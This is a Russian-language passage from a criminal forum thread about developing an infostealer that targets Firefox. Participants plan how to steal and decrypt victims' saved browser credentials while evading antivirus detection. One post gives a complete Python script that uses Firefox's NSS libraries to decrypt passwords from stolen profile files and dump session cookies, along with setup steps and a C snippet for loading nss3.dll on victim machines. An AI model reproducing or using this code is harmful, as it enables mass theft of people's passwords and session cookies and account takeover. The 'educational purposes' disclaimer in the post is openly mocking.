Окей. Есть другой вариант. Скомпилировать стиллер в x86 и попробовать подгрузить nss3.dll и дешифровать. если выбросится 126 ошибка, то специально скачать ранее заготовленный exe который дешифрует данные, но он скомпилирован в x64. Не придется подгружать доп. библиотеки и т.д. Просто exe. Есть вариант хранить в памяти исходный код, dll, asm и когда нужно, записать его в отдельный файл и запустить?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Разработка стилера, обсуждение.
- Автор темы Jeffs
- Дата начала
или просто забить на фаерфокс... так как статистика его унижает...
UPD: давайте еще уберем из статистики пользователей linux так как во многих дистрах фаерфокс как ie, стоит по умолчанию.
UPD: давайте еще уберем из статистики пользователей linux так как во многих дистрах фаерфокс как ie, стоит по умолчанию.
О да, кстати, кто работал с большими логами вне снг. Вам же приходят данные в основном от хрома? Прост я в вируталке и в реале вообще не вижу, чтоб использовали что-то кроме хрома
Если будет время, попробую написать проект расшифровки фаерфокса.
Но не обещаю и незнаю когда.
Но не обещаю и незнаю когда.
Или как минимум, не загружать другой exe. А просто оставить в скомпилированном виде. Повезет если у жертвы x86, а иначе не судьба
Ты будешь первопроходцем в этом деле) Потому что и kpot и у oski и т.д. у них своя система, а статей на эту тему не найти. Все статьи об nss3.dll или другие языки. Если че, я буду очень ждатьЕсли будет время, попробую написать проект расшифровки фаерфокса.
Но не обещаю и незнаю когда.
там принципиально просто всё, щас скину ссылку на что можно опереться https://github.com/kerbyj/goLazagne/blob/master/browsers/mozillaGoLazagne.go на голанге, но по сути разницы нет.Если будет время, попробую написать проект расшифровки фаерфокса.
Но не обещаю и незнаю когда.
это дешифровка без подгрузки nss, те на одном sqlite3 сделать можно.
Структуры данных все одни и те же - по принципам таким же написать можно если вчитаться в код.Ты будешь первопроходцем в этом деле) Потому что и kpot и у oski и т.д. у них своя система, а статей на эту тему не найти. Все статьи об nss3.dll или другие языки. Если че, я буду очень ждать
Я посмотрел кстати, но го чет понять) либ я туплю, потому что уже голову сломал, либ уже нету сил. Это же твой проект? Если да, и если несложно, то можешь реализовать на плюсах и показать алгоритм в отдельной теме посвященный именно firefox
я смогу что либо сделать через неделю, если подождешь то будет ок. я в отпусках.
Да без проблем чувак. Спасибо) приятного отдыха)
У вас должно быть более 200 реакций для просмотра скрытого контента.
Сервер-сайд расшифровка c помощью nss3.
1) Нужно выкачать профиль с тачки, где находится фф.
В профиле должны быть такие файлы как signons.sqlite(старый фф)/key3.db/key4.db, cert8/cert9.db, logins.json, cookies.sqlite. По дефолту они должны быть. Профили кстати кроссплатформенны. По этому этот метод дампа сработает на стыренные профили с ff на эпл ос, линукс, вин. Как видите, по дефолту они есть.
Код:
~/.mozilla/firefox/m********.default$ ls
addons.json lock
addonStartup.json.lz4 logins.json
AlternateServices.txt mediacapabilities
blocklist.xml minidumps
bookmarkbackups notificationstore.json
broadcast-listeners.json permissions.sqlite
broadcast-listeners.json.corrupt pkcs11.txt
browser-extension-data places.sqlite
cert8.db places.sqlite-wal
cert9.db pluginreg.dat
cert_override.txt prefs.js
compatibility.ini protections.sqlite
containers.json revocations.txt
content-prefs.sqlite saved-telemetry-pings
cookies.sqlite search.json.mozlz4
cookies.sqlite-wal secmod.db
crashes SecurityPreloadState.txt
datareporting serviceworker.txt
enumerate_devices.txt sessionCheckpoints.json
extension-preferences.json sessionstore-backups
extensions shield-preference-experiments.json
extension-settings.json shield-recipe-client.json
extensions.json SiteSecurityServiceState.txt
favicons.sqlite storage
favicons.sqlite-wal storage.sqlite
features storage-sync.sqlite
formhistory.sqlite times.json
gmp TRRBlacklist.txt
gmp-gmpopenh264 weave
handlers.json webappsstore.sqlite
key3.db webappsstore.sqlite-wal
key4.db xulstore.json2)Создаешь папку рядом со скриптом. Должна называться libs.
Там должны быть такие файлы. Можешь их вытянуть с фф сборки своей линуксовой.
-libfreeblpriv3.so
-liblgpllibs.so
-libmozsqlite3.so
-libnspr4.so
-libnss3.so
-libnssutil3.so
-libplc4.so
-libplds4.so
-libsoftokn3.so
-libxul.so
3)Дальше тебе в ENV надо записать путь к папке с либами.
LD_LIBRARY_PATH=/path/to/libs && export LD_LIBRARY_PATH
4) Достаем пароли и куки.
Python:
import ctypes as ct
import os, json, sqlite3
from base64 import b64decode
class NSSDecoder(object):
class SECItem(ct.Structure):
_fields_ = [
('type', ct.c_uint),
('data', ct.c_char_p), # actually: unsigned char *
('len', ct.c_uint),
]
class PK11SlotInfo(ct.Structure):
"""opaque structure representing a logical PKCS slot
"""
def __init__(self, libs):
self.NSS = ct.CDLL(os.path.join(libs,'libnss3.so'), mode = ct.RTLD_GLOBAL)
SlotInfoPtr = ct.POINTER(self.PK11SlotInfo)
SECItemPtr = ct.POINTER(self.SECItem)
self._set_ctypes(ct.c_int, "NSS_Init", ct.c_char_p)
self._set_ctypes(ct.c_int, "NSS_Shutdown")
self._set_ctypes(SlotInfoPtr, "PK11_GetInternalKeySlot")
self._set_ctypes(None, "PK11_FreeSlot", SlotInfoPtr)
self._set_ctypes(ct.c_int, "PK11_CheckUserPassword", SlotInfoPtr, ct.c_char_p)
self._set_ctypes(ct.c_int, "PK11SDR_Decrypt", SECItemPtr, SECItemPtr, ct.c_void_p)
self._set_ctypes(None, "SECITEM_ZfreeItem", SECItemPtr, ct.c_int)
self._set_ctypes(ct.c_int, "PORT_GetError")
self._set_ctypes(ct.c_char_p, "PR_ErrorToName", ct.c_int)
self._set_ctypes(ct.c_char_p, "PR_ErrorToString", ct.c_int, ct.c_uint32)
def _set_ctypes(self, restype, name, *argtypes):
res = getattr(self.NSS, name)
res.restype = restype
res.argtypes = argtypes
setattr(self, "_" + name, res)
def decode(self, data64):
data = b64decode(data64)
inp = self.SECItem(0, data, len(data))
out = self.SECItem(0, None, 0)
e = self._PK11SDR_Decrypt(inp, out, None)
if e == -1:
raise Exception('Decryption error', 'DB protected by masterpass')
res = ct.string_at(out.data, out.len).decode('utf-8')
self._SECITEM_ZfreeItem(out, 0)
return res
class NSSInteraction(object):
def __init__(self, libs):
self.NSS = NSSDecoder(libs)
def load_profile(self, profile):
self.profile = profile
profile = profile.encode("utf8")
e = self.NSS._NSS_Init(b"sql:" + profile)
if e != 0:
print('protected by masterpass')
raise Exception('Decryption error', 'Failed to load profile')
def unload_profile(self):
e = self.NSS._NSS_Shutdown()
def decrypt_passwords(self):
credentials = obtain_credentials(self.profile)
logins = []
for entry in credentials:
login = {}
username, password = self.decode_entry(entry['encryptedUsername'], entry['encryptedPassword'])
login['host'] = entry['hostname']
login['login'] = username
login['password'] = password
logins.append(login)
return logins
def decode_entry(self, user64, passw64):
user = self.NSS.decode(user64)
passw = self.NSS.decode(passw64)
return user, passw
def obtain_credentials(profile):
credentials = []
try:
file = os.path.join(profile, "logins.json")
with open(file, 'r') as f:
content = f.read()
content = json.loads(content)['logins']
for entry in content:
logindata = {}
logindata['hostname'] = entry['hostname']
logindata['encryptedUsername'] = entry['encryptedUsername']
logindata['encryptedPassword'] = entry['encryptedPassword']
credentials.append(logindata)
except:
try:
db = os.path.join(profile, "signons.sqlite")
conn = sqlite3.connect(db)
c = conn.cursor()
for row in c.execute("SELECT hostname, encryptedUsername, encryptedPassword, encType FROM moz_logins"):
logindata = {}
logindata['hostname'] = row[0]
logindata['encryptedUsername'] = row[1]
logindata['encryptedPassword'] = row[2]
credentials.append(logindata)
c.close()
conn.close()
except:
print('no login data')
return credentials
def get_logindata(profile):
libs = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'libs')
nss = NSSInteraction(libs)
nss.load_profile(profile)
logins = []
try:
logins = nss.decrypt_passwords()
except:
print('failed to decrypt')
a = nss.unload_profile()
return logins
def get_cookies(profile):
db = os.path.join(profile, 'cookies.sqlite')
conn = sqlite3.connect(db)
c = conn.cursor()
cookies = []
for row in c.execute("SELECT * FROM moz_cookies"):
cookie = {}
if row[10] == 0:
secure = 'false'
else:
secure = 'true'
if row[11] == 0:
httpOnly = 'false'
else:
httpOnly = 'true'
cookie['domain'] = row[5]
cookie['name'] = row[3]
cookie['value'] = row[4].replace('\\', '\\\\').replace('\"', '\\\"')
cookie['path'] = row[6]
cookie['expirationDate'] = row[7]
cookie['secure'] = secure
cookie['httpOnly'] = httpOnly
cookies.append(cookie)
return cookies
def firefox_decryption(profile):
dct_vals = {}
dct_vals['logins'] = []
dct_vals['cookies'] = []
dct_vals['message'] = []
try:
dct_vals['cookies'] = get_cookies(profile)
except Exception as ex:
print('cookies error', profile, ex)
dct_vals['message'].append({'cookie error': str(ex)})
try:
dct_vals['logins'] = get_logindata(profile)
except Exception as ex:
print('logindata error', profile, ex)
dct_vals['message'].append({'logindata error': str(ex)})
return json.dumps(dct_vals, indent=4)
res = firefox_decryption('/path/to/profile')5) Получаем куки и пароли фф любых версий, даже очень старых и очень новых.
6) Упрощаем клиентский(доставляемый) код до безобразия. Без этих ваших ебанных хэвенс гейтов и прочей байтоебки. По детектам также огромный +.
7) Угараем над теми, кто тащит всякую х#йню из зависимостей на тачки с фф. И ебется впридачу с разрядностями фф.
8) Метод не сломается кста, в отличии от кастомных реализаций как у крота. Раньше тоже кастомную трогал, пока очередная обнова в фф ее не сломала. Плюнул, забил и решил переделать на серверсайд nss3. Теперь будет работать всегда, ибо мы используем те же методы, какими фф сам же расшифровывает свои пароли. Если че то сломается, просто либы на новые обновите да и все по идее. Потому что вряд-ли фф разрабы будут менять интерфейсы, это очень тяжелый шаг. А вот реализацию менять как нехуй. Ибо ООП это программирование на уровне интерфейсов, а не реализаций. Менять интерфейсы они скорее всего не будут, ибо на это нужны очень веские причины и очень много работы чтобы ничего не сломать.
9) Кто скажет, что этим сломаем сервер - просто не умеет в масштабирование или сидят как бомжи на шарадах.
10) ???? Profit
11) За вынос с под хайда по мордасам.
12) Код выложен в учебных целях и я не несу ответственности за то, что вы с ним будете делать и блаблабла.
Последнее редактирование:
Не самый нормальный. Обнова фф может сломать твой метод, как это было у меня и не только у меня. Заебешься просто фиксить, рано или поздно. Ненадежно короче. Под хайдом инфа по теме. Как по мне самый идеальный вариант.
Вот это костыль так костыль, но как говорится на вкус и цвет...
- Автор темы
- Добавить закладку
- #35
Интересно, что в твоём понимании не костыль? Своя реализация?
Ну вообще тема была не об этом, у тебя почему-то не грузился nss3.dll, ты решил этот вопрос?
- Автор темы
- Добавить закладку
- #37
Да, решил.
C:
SetCurrentDirectoryW(L"//папка//с//либами//nss3.dll,mozglue.dll");
HMODULE hNss = LoadLibraryW(L"nss3.dll");след вопрос у него будет. А что делать если nss3.dll 32bit, а у меня прога 64bit.
- Автор темы
- Добавить закладку
- #39
Ну да, щас бы малварь под х64 писать.
Хотя как вариант можно с собой вируталбокс 32 битный таскать, там развернуть винду х64 и оттуда уже свою малварь стартовать
Ты стиллер пишешь? Тогда это плохой вариант. Костыль - загружать dll когда у жертвы система 64. Хотя для стиллера это плохая практика.Ну да, щас бы малварь под х64 писать.
Хотя как вариант можно с собой вируталбокс 32 битный таскать, там развернуть винду х64 и оттуда уже свою малварь стартовать